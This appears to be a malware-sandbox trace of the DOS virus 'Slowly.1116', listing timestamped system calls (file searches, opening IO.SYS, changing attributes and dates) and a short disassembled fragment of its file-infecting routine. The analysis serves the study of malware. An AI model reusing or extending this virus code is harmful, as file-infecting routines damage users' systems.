Sample viewer

vx.netlux.org/Virus.DOS.Slowly.1116

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:24:09.146111855Z 37 PC: 23683 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:24:09.147509418Z 25 PC: 23687 | Get default drive
2018-12-17T22:24:09.149526444Z 71 PC: 23697 | Get current directory
2018-12-17T22:24:09.153450695Z 26 PC: 236a0 | Set disk transfer address
2018-12-17T22:24:09.155893083Z 14 PC: 236e7 | Set default drive (Drive = 'C')
2018-12-17T22:24:09.158157996Z 59 PC: 236ee | Change current directory
2018-12-17T22:24:09.16459693Z 42 PC: 236f5 | Get date 0x236f5: cmp byte ptr [0xfe54], dl
0x236f9: mov byte ptr [0xfe54], dl
0x236fd: pop dx
0x236fe: jbe 0x2371a
0x23700: mov ah, 0x5a
0x23702: xor cx, cx
0x23704: int 0x21
0x23706: jb 0x236a0
0x23708: xchg ax, bx
0x23709: mov byte ptr [si + 0x15], 0x27
0x2370d: mov ah, 0x40
0x2370f: mov dx, 0xfe2b
0x23712: mov cx, 0x20
0x23715: int 0x21
0x23717: call 0x239aa
0x2371a: mov ah, 0x4e
0x2371c: mov cx, 0x27
0x2371f: mov dx, 0xfe1a
0x23722: int 0x21
0x23724: jb 0x236a0
2018-12-17T22:24:09.167625277Z 78 PC: 23724 | Find first file
2018-12-17T22:24:09.178327821Z 68 PC: 2374a | I/O control for devices (Set for = 't 3^G]uðv08mode.*')
2018-12-17T22:24:09.180507807Z 68 PC: 2374a | I/O control for devices (Set for = ' 3^G]uðv08mode.*')
2018-12-17T22:24:09.183038046Z 68 PC: 2374a | I/O control for devices (Set for = '3^G]uðv08mode.*')
2018-12-17T22:24:09.186225053Z 14 PC: 23756 | Set default drive (Drive = 'C')
2018-12-17T22:24:09.187753217Z 59 PC: 2375d | Change current directory
2018-12-17T22:24:09.191701055Z 26 PC: 23766 | Set disk transfer address
2018-12-17T22:24:09.193463608Z 78 PC: 23770 | Find first file
2018-12-17T22:24:09.199734335Z 67 PC: 237e5 | Get or set file attributes
2018-12-17T22:24:09.540333966Z 61 PC: 237ec | Open file (Filename = 'IO.SYS')
2018-12-17T22:24:09.548093994Z 87 PC: 239b7 | Get or set file date and time
2018-12-17T22:24:09.550727636Z 62 PC: 239bb | Close file
2018-12-17T22:24:09.565641396Z 67 PC: 239c8 | Get or set file attributes
2018-12-17T22:24:09.576083179Z 79 PC: 23789 | Find next file
2018-12-17T22:24:09.583794589Z 25 PC: 23740 | Get default drive
2018-12-17T22:24:09.585266575Z 68 PC: 2374a | I/O control for devices (Set for = '5;=Ìَ.tD')
2018-12-17T22:24:09.587419468Z 14 PC: 23961 | Set default drive (Drive = 'A')
2018-12-17T22:24:09.590065112Z 59 PC: 23968 | Change current directory
2018-12-17T22:24:09.594404288Z 37 PC: 23974 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:24:09.595456567Z 26 PC: 23999 | Set disk transfer address
2018-12-17T22:24:09.597444216Z 9 PC: 12a5c | Display string (Could not find end pointer)
2018-12-17T22:24:09.604004902Z 76 PC: 12a61 | Terminate with return code (Return code = '0')